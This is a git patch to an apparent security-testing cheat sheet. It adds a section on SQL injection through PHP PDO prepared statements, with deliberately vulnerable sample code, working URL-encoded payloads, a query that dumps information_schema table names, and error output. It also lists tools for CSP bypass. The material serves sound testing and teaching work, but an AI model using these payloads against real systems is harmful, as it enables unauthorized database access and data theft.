From ac73b0c619b112c61f580e637576dd872b5d993d Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sat, 26 Jul 2025 15:21:23 +0200 Subject: [PATCH] PDO Prepared Statements --- SQL Injection/README.md | 75 ++++++++++++++++++++++++++++++++- XSS Injection/4 - CSP Bypass.md | 12 +++--- 2 files changed, 81 insertions(+), 6 deletions(-) diff --git a/SQL Injection/README.md b/SQL Injection/README.md index 5bbe8ba..092d813 100644 --- a/SQL Injection/README.md +++ b/SQL Injection/README.md @@ -29,6 +29,7 @@ * [Polyglot Injection](#polyglot-injection) * [Routed Injection](#routed-injection) * [Second Order SQL Injection](#second-order-sql-injection) +* [PDO Prepared Statements](#pdo-prepared-statements) * [Generic WAF Bypass](#generic-waf-bypass) * [White Spaces](#white-spaces) * [No Comma Allowed](#no-comma-allowed) @@ -365,6 +366,77 @@ password="P@ssw0rd" Since you are inserting your payload in the database for a later use, any other type of injections can be used UNION, ERROR, BLIND, STACKED, etc. +## PDO Prepared Statements + +PDO, or PHP Data Objects, is an extension for PHP that provides a consistent and secure way to access and interact with databases. It is designed to offer a standardized approach to database interaction, allowing developers to use a consistent API across multiple types of databases like MySQL, PostgreSQL, SQLite, and more. + +PDO allows for binding of input parameters, which ensures that user data is properly sanitized before being executed as part of a SQL query. However it might still be vulnerable to SQL injections if the developers allowed user input inside the SQL query. + +**Requirements**: + +* DMBS + * **MySQL** is vulnerable by default. + * **Postgres** is not vulnerable by default, unless the emulation is turned on with `PDO::ATTR_EMULATE_PREPARES => true`. + * **SQLite** is not vulnerable to this attack. + +* SQL injection anywhere inside a PDO statement: `$pdo->prepare("SELECT $INJECT_SQL_HERE...")`. +* PDO used for another SQL parameter, either with `?` or `:parameter`. + + ```php + $pdo = new PDO(APP_DB_HOST, APP_DB_USER, APP_DB_PASS); + $col = '`' . str_replace('`', '``', $_GET['col']) . '`'; + + $stmt = $pdo->prepare("SELECT $col FROM animals WHERE name = ?"); + $stmt->execute([$_GET['name']]); + // or + $stmt = $pdo->prepare("SELECT $col FROM animals WHERE name = :name"); + $stmt->execute(['name' => $_GET['name']]); + ``` + +**Methodology**: + +**NOTE**: In PHP 8.3 and lower, the injection happens even without a null byte (`\0`). The attacker only needs to smuggle a "`:`" or a "`?`". + +* Detect the SQLi using `?#\0`: `GET /index.php?col=%3f%23%00&name=anything` + + ```ps1 + # 1st Payload: ?#\0 + # 2nd Payload: anything + You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '`'anything'#' at line 1 + ``` + +* Force a select \`'x\` instead of a column name and create a comment. Inject a backtick to fix the column and terminate the SQL query with `;#`: `GET /index.php?col=%3f%23%00&name=x%60;%23` + + ```ps1 + # 1st Payload: ?#\0 + # 2nd Payload: x`;# + Column not found: 1054 Unknown column ''x' in 'SELECT' + ``` + +* Inject in second parameter the payload. `GET /index2.php?col=\%3f%23%00&name=x%60+FROM+(SELECT+table_name+AS+`'x`+from+information_schema.tables)y%3b%2523` + + ```ps1 + # 1st Payload: \?#\0 + # 2nd Payload: x` FROM (SELECT table_name AS `'x` from information_schema.tables)y;%23 + ALL_PLUGINS + APPLICABLE_ROLES + CHARACTER_SETS + CHECK_CONSTRAINTS + COLLATIONS + COLLATION_CHARACTER_SET_APPLICABILITY + COLUMNS + ``` + +* Final SQL queries + + ```SQL + -- Before $pdo->prepare + SELECT `\?#\0` FROM animals WHERE name = ? + + -- After $pdo->prepare + SELECT `\'x` FROM (SELECT table_name AS `\'x` from information_schema.tables)y;#'#\0` FROM animals WHERE name = ? + ``` + ## Generic WAF Bypass ### White Spaces @@ -461,12 +533,13 @@ Bypass using keywords case insensitive or an equivalent operator. ## References +* [A Novel Technique for SQL Injection in PDO’s Prepared Statements - Adam Kues - July 21, 2025](https://slcyber.io/assetnote-security-research-center/a-novel-technique-for-sql-injection-in-pdos-prepared-statements) * [Analyzing CVE-2018-6376 – Joomla!, Second Order SQL Injection - Not So Secure - February 9, 2018](https://web.archive.org/web/20180209143119/https://www.notsosecure.com/analyzing-cve-2018-6376/) * [Implement a Blind Error-Based SQLMap payload for SQLite - soka - August 24, 2023](https://sokarepo.github.io/web/2023/08/24/implement-blind-sqlite-sqlmap.html) * [Manual SQL Injection Discovery Tips - Gerben Javado - August 26, 2017](https://gerbenjavado.com/manual-sql-injection-discovery-tips/) * [NetSPI SQL Injection Wiki - NetSPI - December 21, 2017](https://sqlwiki.netspi.com/) * [PentestMonkey's mySQL injection cheat sheet - @pentestmonkey - August 15, 2011](http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet) * [SQLi Cheatsheet - NetSparker - March 19, 2022](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/) -* [SQLi in INSERT worse than SELECT - Mathias Karlsson - Feb 14, 2017](https://labs.detectify.com/2017/02/14/sqli-in-insert-worse-than-select/) +* [SQLi in INSERT worse than SELECT - Mathias Karlsson - February 14, 2017](https://labs.detectify.com/2017/02/14/sqli-in-insert-worse-than-select/) * [SQLi Optimization and Obfuscation Techniques - Roberto Salgado - 2013](https://web.archive.org/web/20221005232819/https://paper.bobylive.com/Meeting_Papers/BlackHat/USA-2013/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf) * [The SQL Injection Knowledge base - Roberto Salgado - May 29, 2013](https://websec.ca/kb/sql_injection) diff --git a/XSS Injection/4 - CSP Bypass.md b/XSS Injection/4 - CSP Bypass.md index 4fd5f02..9fed2a5 100644 --- a/XSS Injection/4 - CSP Bypass.md +++ b/XSS Injection/4 - CSP Bypass.md @@ -4,7 +4,7 @@ ## Summary -- [CSP Detection](#csp-detection) +- [Tools](#tools) - [Bypass CSP using JSONP](#bypass-csp-using-jsonp) - [Bypass CSP default-src](#bypass-csp-default-src) - [Bypass CSP inline eval](#bypass-csp-inline-eval) @@ -16,9 +16,10 @@ - [Labs](#labs) - [References](#references) -## CSP Detection +## Tools -Check the CSP on [https://csp-evaluator.withgoogle.com](https://csp-evaluator.withgoogle.com) and the post : [How to use Google’s CSP Evaluator to bypass CSP](https://websecblog.com/vulns/google-csp-evaluator/) +- [gmsgadget.com](https://gmsgadget.com/) - GMSGadget (Give Me a Script Gadget) is a collection of JavaScript gadgets that can be used to bypass XSS mitigations such as Content Security Policy (CSP) and HTML sanitizers like DOMPurify. +- [csp-evaluator.withgoogle.com](https://csp-evaluator.withgoogle.com) - CSP Evaluator allows developers and security experts to check if a Content Security Policy (CSP) serves as a strong mitigation against cross-site scripting attacks. ## Bypass CSP using JSONP @@ -173,5 +174,6 @@ Source: [@pilvar222](https://twitter.com/pilvar222/status/1784618120902005070) ## References - [Airbnb – When Bypassing JSON Encoding, XSS Filter, WAF, CSP, and Auditor turns into Eight Vulnerabilities - Brett Buerhaus (@bbuerhaus) - March 8, 2017](https://buer.haus/2017/03/08/airbnb-when-bypassing-json-encoding-xss-filter-waf-csp-and-auditor-turns-into-eight-vulnerabilities/) -- [D1T1 - So We Broke All CSPs - Michele Spagnuolo and Lukas Weichselbaum - 27 Jun 2017](http://web.archive.org/web/20170627043828/https://conference.hitb.org/hitbsecconf2017ams/materials/D1T1%20-%20Michele%20Spagnuolo%20and%20Lukas%20Wilschelbaum%20-%20So%20We%20Broke%20All%20CSPS.pdf) -- [Making an XSS triggered by CSP bypass on Twitter - wiki.ioin.in(查看原文) - 2020-04-06](https://www.buaq.net/go-25883.html) +- [D1T1 - So We Broke All CSPs - Michele Spagnuolo and Lukas Weichselbaum - June 27, 2017](http://web.archive.org/web/20170627043828/https://conference.hitb.org/hitbsecconf2017ams/materials/D1T1%20-%20Michele%20Spagnuolo%20and%20Lukas%20Wilschelbaum%20-%20So%20We%20Broke%20All%20CSPS.pdf) +- [How to use Google’s CSP Evaluator to bypass CSP - Thomas Orlita - September 9, 2018](https://websecblog.com/vulns/google-csp-evaluator/) +- [Making an XSS triggered by CSP bypass on Twitter - wiki.ioin.in(查看原文) - April 6, 2020](https://www.buaq.net/go-25883.html)